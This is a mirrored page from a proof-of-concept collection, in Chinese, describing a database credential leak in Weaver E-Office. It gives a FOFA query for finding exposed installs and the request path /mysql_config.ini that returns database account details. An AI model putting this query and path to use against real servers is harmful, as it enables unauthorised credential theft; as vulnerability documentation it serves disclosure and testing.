admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞.md
Threekiii 8b4e8ec87c OA产品漏洞
2022-02-21 09:35:01 +08:00

31 lines
494 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
## 漏洞描述
泛微 E-Office mysql_config.ini文件可直接访问泄漏数据库账号密码等信息
## 漏洞影响
```
泛微 E-Office
```
## FOFA
```
app="泛微-EOffice"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048925.png)
验证POC
```php
/mysql_config.ini
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048869.png)
Reference in New Issue View Git Blame Copy Permalink